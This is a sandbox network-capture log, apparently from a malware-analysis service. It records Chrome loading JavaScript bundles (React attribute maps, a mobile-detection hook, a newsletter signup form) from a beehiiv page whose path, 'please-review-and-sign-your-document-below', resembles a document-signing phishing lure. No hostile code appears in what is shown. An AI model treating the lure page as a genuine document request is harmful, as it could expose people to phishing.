                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 3a 6e 75 6c 6c 2c 6f 6e 4d 6f 75 73 65 4d 6f 76 65 3a 6e 75 6c 6c 2c 6f 6e 4d 6f 75 73 65 4f 75 74 3a 6e 75 6c 6c 2c 6f 6e 4d 6f 75 73 65 4f 76 65 72 3a 6e 75 6c 6c 2c 6f 6e 4d 6f 75 73 65 55 70 3a 6e 75 6c 6c 2c 6f 6e 4f 66 66 6c 69 6e 65 3a 6e 75 6c 6c 2c 6f 6e 4f 6e 6c 69 6e 65 3a 6e 75 6c 6c 2c 6f 6e 50 61 67 65 48 69 64 65 3a 6e 75 6c 6c 2c 6f 6e 50 61 67 65 53 68 6f 77 3a 6e 75 6c 6c 2c 6f 6e 50 61 73 74 65 3a 6e 75 6c 6c 2c 6f 6e 50 61 75 73 65 3a 6e 75 6c 6c 2c 6f 6e 50 6c 61 79 3a 6e 75 6c 6c 2c 6f 6e 50 6c 61 79 69 6e 67 3a 6e 75 6c 6c 2c 6f 6e 50 6f 70 53 74 61 74 65 3a 6e 75 6c 6c 2c 6f 6e 50 72 6f 67 72 65 73 73 3a 6e 75 6c 6c 2c 6f 6e 52 61 74 65 43 68 61 6e 67 65 3a 6e 75 6c 6c 2c 6f 6e 52 65 6a 65 63 74 69 6f 6e 48 61 6e 64 6c 65 64 3a 6e
                                                                                                                                            Data Ascii: :null,onMouseMove:null,onMouseOut:null,onMouseOver:null,onMouseUp:null,onOffline:null,onOnline:null,onPageHide:null,onPageShow:null,onPaste:null,onPause:null,onPlay:null,onPlaying:null,onPopState:null,onProgress:null,onRateChange:null,onRejectionHandled:n
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 73 65 3a 6e 75 6c 6c 2c 63 6f 64 65 54 79 70 65 3a 6e 75 6c 6c 2c 63 6f 6c 6f 72 3a 6e 75 6c 6c 2c 63 6f 6d 70 61 63 74 3a 4d 2c 64 65 63 6c 61 72 65 3a 4d 2c 65 76 65 6e 74 3a 6e 75 6c 6c 2c 66 61 63 65 3a 6e 75 6c 6c 2c 66 72 61 6d 65 3a 6e 75 6c 6c 2c 66 72 61 6d 65 42 6f 72 64 65 72 3a 6e 75 6c 6c 2c 68 53 70 61 63 65 3a 43 2c 6c 65 66 74 4d 61 72 67 69 6e 3a 43 2c 6c 69 6e 6b 3a 6e 75 6c 6c 2c 6c 6f 6e 67 44 65 73 63 3a 6e 75 6c 6c 2c 6c 6f 77 53 72 63 3a 6e 75 6c 6c 2c 6d 61 72 67 69 6e 48 65 69 67 68 74 3a 43 2c 6d 61 72 67 69 6e 57 69 64 74 68 3a 43 2c 6e 6f 52 65 73 69 7a 65 3a 4d 2c 6e 6f 48 72 65 66 3a 4d 2c 6e 6f 53 68 61 64 65 3a 4d 2c 6e 6f 57 72 61 70 3a 4d 2c 6f 62 6a 65 63 74 3a 6e 75 6c 6c 2c 70 72 6f 66 69 6c 65 3a 6e 75 6c 6c 2c 70 72
                                                                                                                                            Data Ascii: se:null,codeType:null,color:null,compact:M,declare:M,event:null,face:null,frame:null,frameBorder:null,hSpace:C,leftMargin:C,link:null,longDesc:null,lowSrc:null,marginHeight:C,marginWidth:C,noResize:M,noHref:M,noShade:M,noWrap:M,object:null,profile:null,pr
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 6f 6e 74 2d 76 61 72 69 61 6e 74 22 2c 66 6f 6e 74 57 65 69 67 68 74 3a 22 66 6f 6e 74 2d 77 65 69 67 68 74 22 2c 67 6c 79 70 68 4e 61 6d 65 3a 22 67 6c 79 70 68 2d 6e 61 6d 65 22 2c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f 6e 48 6f 72 69 7a 6f 6e 74 61 6c 3a 22 67 6c 79 70 68 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 2d 68 6f 72 69 7a 6f 6e 74 61 6c 22 2c 67 6c 79 70 68 4f 72 69 65 6e 74 61 74 69 6f 6e 56 65 72 74 69 63 61 6c 3a 22 67 6c 79 70 68 2d 6f 72 69 65 6e 74 61 74 69 6f 6e 2d 76 65 72 74 69 63 61 6c 22 2c 68 72 65 66 4c 61 6e 67 3a 22 68 72 65 66 6c 61 6e 67 22 2c 68 6f 72 69 7a 41 64 76 58 3a 22 68 6f 72 69 7a 2d 61 64 76 2d 78 22 2c 68 6f 72 69 7a 4f 72 69 67 69 6e 58 3a 22 68 6f 72 69 7a 2d 6f 72 69 67 69 6e 2d 78 22 2c 68 6f 72 69 7a 4f 72 69
                                                                                                                                            Data Ascii: ont-variant",fontWeight:"font-weight",glyphName:"glyph-name",glyphOrientationHorizontal:"glyph-orientation-horizontal",glyphOrientationVertical:"glyph-orientation-vertical",hrefLang:"hreflang",horizAdvX:"horiz-adv-x",horizOriginX:"horiz-origin-x",horizOri
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 63 68 61 6e 67 65 22 2c 6f 6e 49 6e 70 75 74 3a 22 6f 6e 69 6e 70 75 74 22 2c 6f 6e 49 6e 76 61 6c 69 64 3a 22 6f 6e 69 6e 76 61 6c 69 64 22 2c 6f 6e 4b 65 79 44 6f 77 6e 3a 22 6f 6e 6b 65 79 64 6f 77 6e 22 2c 6f 6e 4b 65 79 50 72 65 73 73 3a 22 6f 6e 6b 65 79 70 72 65 73 73 22 2c 6f 6e 4b 65 79 55 70 3a 22 6f 6e 6b 65 79 75 70 22 2c 6f 6e 4c 6f 61 64 3a 22 6f 6e 6c 6f 61 64 22 2c 6f 6e 4c 6f 61 64 65 64 44 61 74 61 3a 22 6f 6e 6c 6f 61 64 65 64 64 61 74 61 22 2c 6f 6e 4c 6f 61 64 65 64 4d 65 74 61 64 61 74 61 3a 22 6f 6e 6c 6f 61 64 65 64 6d 65 74 61 64 61 74 61 22 2c 6f 6e 4c 6f 61 64 53 74 61 72 74 3a 22 6f 6e 6c 6f 61 64 73 74 61 72 74 22 2c 6f 6e 4d 65 73 73 61 67 65 3a 22 6f 6e 6d 65 73 73 61 67 65 22 2c 6f 6e 4d 6f 75 73 65 44 6f 77 6e 3a 22 6f 6e
                                                                                                                                            Data Ascii: change",onInput:"oninput",onInvalid:"oninvalid",onKeyDown:"onkeydown",onKeyPress:"onkeypress",onKeyUp:"onkeyup",onLoad:"onload",onLoadedData:"onloadeddata",onLoadedMetadata:"onloadedmetadata",onLoadStart:"onloadstart",onMessage:"onmessage",onMouseDown:"on
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 73 74 72 69 6b 65 74 68 72 6f 75 67 68 50 6f 73 69 74 69 6f 6e 3a 22 73 74 72 69 6b 65 74 68 72 6f 75 67 68 2d 70 6f 73 69 74 69 6f 6e 22 2c 73 74 72 69 6b 65 74 68 72 6f 75 67 68 54 68 69 63 6b 6e 65 73 73 3a 22 73 74 72 69 6b 65 74 68 72 6f 75 67 68 2d 74 68 69 63 6b 6e 65 73 73 22 2c 73 74 72 6f 6b 65 44 61 73 68 41 72 72 61 79 3a 22 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 22 2c 73 74 72 6f 6b 65 44 61 73 68 4f 66 66 73 65 74 3a 22 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 43 61 70 3a 22 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 22 2c 73 74 72 6f 6b 65 4c 69 6e 65 4a 6f 69 6e 3a 22 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 22 2c 73 74 72 6f 6b 65 4d 69 74 65 72 4c 69 6d 69 74 3a 22 73 74 72 6f 6b
                                                                                                                                            Data Ascii: strikethroughPosition:"strikethrough-position",strikethroughThickness:"strikethrough-thickness",strokeDashArray:"stroke-dasharray",strokeDashOffset:"stroke-dashoffset",strokeLineCap:"stroke-linecap",strokeLineJoin:"stroke-linejoin",strokeMiterLimit:"strok


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            102192.168.2.1649826104.18.69.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC846OUTGET /assets/useIsMobile-onEuuMFV.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                            Origin: https://kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                            Referer: https://kanes-newsletter-871ead.beehiiv.com/p/please-review-and-sign-your-document-below
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC911INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 710
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736960704&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=ZSTm5tjtoUyepT8GE0uMWa%2BNcCEepGTOSPZjUVss40E%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"2c6-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Age: 4164
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b5ef060cc8-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC458INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 66 34 34 36 65 61 63 36 2d 30 35 63 33 2d 35 39 32 36 2d 62 62 34 61 2d 31 65 66 34 38 65 30 36 32 32 31 37 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="f446eac6-05c3-5926-bb4a-1ef48e062217")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC252INData Raw: 21 65 3f 69 28 21 30 29 3a 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3e 73 26 26 65 26 26 69 28 21 31 29 7d 3b 72 65 74 75 72 6e 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 6e 29 2c 28 29 3d 3e 7b 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 72 65 73 69 7a 65 22 2c 6e 29 7d 7d 2c 5b 65 5d 29 2c 65 7d 3b 65 78 70 6f 72 74 7b 6f 20 61 73 20 75 7d 3b 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 75 73 65 49 73 4d 6f 62 69 6c 65 2d 6f 6e 45 75 75 4d 46 56 2e 6a 73 2e 6d 61 70 0a 0a 2f 2f 23 20 64 65 62 75 67 49 64 3d 66 34 34 36 65 61 63 36 2d 30 35 63 33 2d 35 39 32 36 2d 62 62 34 61 2d 31 65 66 34 38 65 30 36 32 32 31 37 0a
                                                                                                                                            Data Ascii: !e?i(!0):window.innerWidth>s&&e&&i(!1)};return window.addEventListener("resize",n),()=>{window.removeEventListener("resize",n)}},[e]),e};export{o as u};//# sourceMappingURL=useIsMobile-onEuuMFV.js.map//# debugId=f446eac6-05c3-5926-bb4a-1ef48e062217


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            103192.168.2.1649829104.18.68.404436900C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2025-01-15 18:14:37 UTC557OUTGET /assets/CreateAction-Dl0JjCOR.js HTTP/1.1
                                                                                                                                            Host: kanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Connection: keep-alive
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                            Accept: */*
                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                            Cookie: __cf_bm=t1Fh0BcpV0SOaArg44wQqvHJ6eOZqrp8ju2X4P9gJ1Q-1736964871-1.0.1.1-8msfSrG.4jE02ExjAY2XvlEHJYje6PKQiLD3pDhYWiVzx8VaW4mRZex8mRH1GKAMiAw3TiXfeTt4v72pcM1HFQ
                                                                                                                                            2025-01-15 18:14:37 UTC903INHTTP/1.1 200 OK
                                                                                                                                            Date: Wed, 15 Jan 2025 18:14:37 GMT
                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                            Content-Length: 18549
                                                                                                                                            Connection: close
                                                                                                                                            Report-To: {"group":"heroku-nel","max_age":3600,"endpoints":[{"url":"https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D"}]}
                                                                                                                                            Reporting-Endpoints: heroku-nel=https://nel.heroku.com/reports?ts=1736957252&sid=1b10b0ff-8a76-4548-befa-353fc6c6c045&s=xQ8MxGvNU7EE0iKm%2FA5pFUt0PxZ0aoksaPCLdkAW27I%3D
                                                                                                                                            Nel: {"report_to":"heroku-nel","max_age":3600,"success_fraction":0.005,"failure_fraction":0.05,"response_headers":["Via"]}
                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                            Last-Modified: Tue, 24 Dec 2024 16:29:01 GMT
                                                                                                                                            Etag: W/"4875-193f98014c8"
                                                                                                                                            Via: 1.1 vegur, 1.1 vegur
                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 9027d8b60b3d8c2f-EWR
                                                                                                                                            2025-01-15 18:14:37 UTC466INData Raw: 0a 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 3f 67 6c 6f 62 61 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 73 65 6c 66 3f 73 65 6c 66 3a 7b 7d 2c 6e 3d 28 6e 65 77 20 45 72 72 6f 72 29 2e 73 74 61 63 6b 3b 6e 26 26 28 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 3d 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 7c 7c 7b 7d 2c 65 2e 5f 73 65 6e 74 72 79 44 65 62 75 67 49 64 73 5b 6e 5d 3d 22 39 64 62 30 61 32 61 64 2d 35 61 38 64 2d 35 36 33 38 2d 39 31 39 62 2d 38 63 30 63 34 34 61 30 33 30 37 65 22 29 7d 63 61 74 63 68 28
                                                                                                                                            Data Ascii: !function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9db0a2ad-5a8d-5638-919b-8c0c44a0307e")}catch(
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 66 65 2c 75 20 61 73 20 68 65 2c 4c 20 61 73 20 78 65 7d 66 72 6f 6d 22 2e 2f 50 61 67 65 50 72 6f 76 69 64 65 72 2d 75 4b 78 6f 69 4e 64 6c 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 67 65 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 6f 61 73 74 2d 44 4b 34 32 75 46 30 37 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 59 7d 66 72 6f 6d 22 2e 2f 75 73 65 54 72 61 6e 73 6c 61 74 69 6f 6e 2d 43 66 4b 4a 41 6d 47 59 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75 20 61 73 20 45 65 2c 64 20 61 73 20 6b 65 2c 63 20 61 73 20 62 65 7d 66 72 6f 6d 22 2e 2f 63 6f 6d 70 6f 6e 65 6e 74 73 2d 4f 6a 32 78 4d 66 47 45 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 63 20 61 73 20 4e 7d 66 72 6f 6d 22 2e 2f 69 6e 64 65 78 2d 78 32 64 61 5f 7a 63 76 2e 6a 73 22 3b 69 6d 70 6f 72 74 7b 75
                                                                                                                                            Data Ascii: fe,u as he,L as xe}from"./PageProvider-uKxoiNdl.js";import{u as ge}from"./useToast-DK42uF07.js";import{u as Y}from"./useTranslation-CfKJAmGY.js";import{u as Ee,d as ke,c as be}from"./components-Oj2xMfGE.js";import{c as N}from"./index-x2da_zcv.js";import{u
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 75 62 6c 69 63 61 74 69 6f 6e 49 64 3a 72 7d 29 3d 3e 65 2e 6a 73 78 28 76 65 2c 7b 66 61 6c 6c 62 61 63 6b 3a 65 2e 6a 73 78 28 65 2e 46 72 61 67 6d 65 6e 74 2c 7b 7d 29 2c 63 68 69 6c 64 72 65 6e 3a 28 29 3d 3e 65 2e 6a 73 78 73 28 65 2e 46 72 61 67 6d 65 6e 74 2c 7b 63 68 69 6c 64 72 65 6e 3a 5b 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 68 69 64 64 65 6e 3a 21 30 2c 6e 61 6d 65 3a 22 72 65 66 22 2c 76 61 6c 75 65 3a 6f 7c 7c 22 22 2c 6f 6e 43 68 61 6e 67 65 3a 28 29 3d 3e 6e 75 6c 6c 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 68 69 64 64 65 6e 3a 21 30 2c 6e 61 6d 65 3a 22 62 68 62 61 22 2c 76 61 6c 75 65 3a 72 7c 7c 22 22 2c 6f 6e 43 68 61 6e 67 65 3a 28 29 3d 3e 6e 75 6c 6c 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 68 69 64
                                                                                                                                            Data Ascii: ublicationId:r})=>e.jsx(ve,{fallback:e.jsx(e.Fragment,{}),children:()=>e.jsxs(e.Fragment,{children:[e.jsx("input",{hidden:!0,name:"ref",value:o||"",onChange:()=>null}),e.jsx("input",{hidden:!0,name:"bhba",value:r||"",onChange:()=>null}),e.jsx("input",{hid
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 73 74 20 67 3d 7b 73 74 61 72 74 65 64 41 74 3a 6e 65 77 20 44 61 74 65 28 29 2e 74 6f 49 53 4f 53 74 72 69 6e 67 28 29 2c 63 75 72 72 65 6e 74 49 6e 64 65 78 3a 30 2c 6e 65 78 74 49 6e 64 65 78 3a 31 2c 72 65 64 69 72 65 63 74 73 3a 6b 7d 3b 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 78 65 2e 53 49 47 4e 55 50 5f 52 45 44 49 52 45 43 54 53 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 67 29 29 7d 21 79 26 26 66 3f 2e 72 65 64 69 72 65 63 74 54 6f 26 26 28 53 26 26 68 3f 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 69 66 28 6a 65 28 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 29 29 74 72 79 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 3d 66 3f 2e 72 65 64 69 72 65 63 74 54 6f 7d 63 61 74 63 68 7b 77 69 6e 64 6f 77
                                                                                                                                            Data Ascii: st g={startedAt:new Date().toISOString(),currentIndex:0,nextIndex:1,redirects:k};localStorage.setItem(xe.SIGNUP_REDIRECTS,JSON.stringify(g))}!y&&f?.redirectTo&&(S&&h?setTimeout(()=>{if(je(navigator.userAgent))try{window.location=f?.redirectTo}catch{window
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 61 74 68 22 2c 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 76 61 6c 75 65 3a 56 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 22 73 65 6e 74 5f 66 72 6f 6d 5f 6f 72 63 68 69 64 22 2c 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 76 61 6c 75 65 3a 22 74 72 75 65 22 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 22 66 61 6c 6c 62 61 63 6b 5f 70 61 74 68 22 2c 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 76 61 6c 75 65 3a 76 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 22 64 6f 75 62 6c 65 5f 6f 70 74 22 2c 74 79 70 65 3a 22 68 69 64 64 65 6e 22 2c 76 61 6c 75 65 3a 4f 2e 74 6f 53 74 72 69 6e 67 28 29 7d 29 2c 65 2e 6a 73 78 28 22 69 6e 70 75 74 22 2c 7b 6e 61 6d 65 3a 22 74 72 69 67 67 65 72 5f 72
                                                                                                                                            Data Ascii: ath",type:"hidden",value:V}),e.jsx("input",{name:"sent_from_orchid",type:"hidden",value:"true"}),e.jsx("input",{name:"fallback_path",type:"hidden",value:v}),e.jsx("input",{name:"double_opt",type:"hidden",value:O.toString()}),e.jsx("input",{name:"trigger_r
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 63 6f 6c 6f 72 3a 6d 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 6e 28 22 73 68 61 72 65 64 2e 63 74 61 2e 67 64 70 72 5f 73 69 67 6e 75 70 5f 63 6f 6e 73 65 6e 74 22 29 2c 22 20 22 2c 6e 28 22 73 68 61 72 65 64 2e 63 74 61 2e 73 69 67 6e 5f 75 70 22 29 2c 22 20 22 2c 65 2e 6a 73 78 28 22 61 22 2c 7b 68 72 65 66 3a 22 2f 74 6f 73 22 2c 74 61 72 67 65 74 3a 22 5f 62 6c 61 6e 6b 22 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 75 6e 64 65 72 6c 69 6e 65 20 75 6e 64 65 72 6c 69 6e 65 2d 6f 66 66 73 65 74 2d 31 20 68 6f 76 65 72 3a 6f 70 61 63 69 74 79 2d 38 30 22 2c 72 65 6c 3a 22 6e 6f 72 65 66 65 72 72 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 6e 28 22 6d 65 74 61 2e 74 69 74 6c 65 73 2e 74 6f 73 22 29 7d 29 2c 22 2e 22 5d 7d 29 5d 7d 29 5d 7d 29 5d 7d 29 7d 29 7d 3b 66 75 6e
                                                                                                                                            Data Ascii: color:m},children:[n("shared.cta.gdpr_signup_consent")," ",n("shared.cta.sign_up")," ",e.jsx("a",{href:"/tos",target:"_blank",className:"underline underline-offset-1 hover:opacity-80",rel:"noreferrer",children:n("meta.titles.tos")}),"."]})]})]})]})})};fun
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 3a 61 2c 72 65 71 75 69 72 65 64 3a 21 30 2c 73 74 79 6c 65 3a 7b 2e 2e 2e 74 26 26 7b 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 74 7d 2c 2e 2e 2e 6f 26 26 7b 66 6f 6e 74 46 61 6d 69 6c 79 3a 6f 7d 2c 63 6f 6c 6f 72 3a 22 23 31 31 31 38 32 37 22 7d 2c 63 6c 61 73 73 4e 61 6d 65 3a 4e 28 22 77 74 2d 62 75 74 74 6f 6e 2d 66 6f 6e 74 20 7a 2d 31 30 20 77 2d 66 75 6c 6c 20 62 6f 72 64 65 72 2d 6e 6f 6e 65 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 70 6c 61 63 65 68 6f 6c 64 65 72 2d 73 68 6f 77 6e 3a 74 65 78 74 2d 65 6c 6c 69 70 73 69 73 22 2c 7b 22 74 65 78 74 2d 6c 67 20 66 6f 63 75 73 3a 74 65 78 74 2d 6c 67 20 61 63 74 69 76 65 3a 74 65 78 74 2d 6c 67 20 73 6d 3a 74 65 78 74 2d 6c 67 22 3a 21 72 7c 7c 72 3d 3d 3d 22 6c 67 22 7d 2c 7b 22 74 65 78 74 2d 73
                                                                                                                                            Data Ascii: :a,required:!0,style:{...t&&{borderColor:t},...o&&{fontFamily:o},color:"#111827"},className:N("wt-button-font z-10 w-full border-none bg-transparent placeholder-shown:text-ellipsis",{"text-lg focus:text-lg active:text-lg sm:text-lg":!r||r==="lg"},{"text-s
                                                                                                                                            2025-01-15 18:14:37 UTC1369INData Raw: 74 69 76 65 3a 74 65 78 74 2d 6c 67 20 73 6d 3a 74 65 78 74 2d 6c 67 22 3a 21 61 7c 7c 61 3d 3d 3d 22 6c 67 22 7d 2c 7b 22 74 65 78 74 2d 73 6d 20 66 6f 63 75 73 3a 74 65 78 74 2d 73 6d 20 61 63 74 69 76 65 3a 74 65 78 74 2d 73 6d 22 3a 61 3d 3d 3d 22 73 6d 22 7d 2c 64 3f 70 2e 72 61 64 69 75 73 3a 71 65 28 70 2e 72 61 64 69 75 73 29 2c 6d 29 2c 64 69 73 61 62 6c 65 64 3a 74 7d 29 7d 2c 4c 65 3d 28 7b 73 69 67 6e 75 70 53 74 79 6c 65 73 3a 74 2c 69 73 53 75 62 6d 69 74 74 69 6e 67 3a 6f 2c 61 75 74 6f 46 6f 63 75 73 3a 72 2c 73 65 74 45 6d 61 69 6c 3a 73 2c 6f 6e 45 6d 61 69 6c 43 68 61 6e 67 65 3a 61 7d 29 3d 3e 7b 63 6f 6e 73 74 7b 66 6f 6e 74 46 61 6d 69 6c 79 3a 69 2c 66 6f 6e 74 53 69 7a 65 3a 6d 2c 62 75 74 74 6f 6e 46 6f 6e 74 46 61 6d 69 6c 79 3a
                                                                                                                                            Data Ascii: tive:text-lg sm:text-lg":!a||a==="lg"},{"text-sm focus:text-sm active:text-sm":a==="sm"},d?p.radius:qe(p.radius),m),disabled:t})},Le=({signupStyles:t,isSubmitting:o,autoFocus:r,setEmail:s,onEmailChange:a})=>{const{fontFamily:i,fontSize:m,buttonFontFamily:
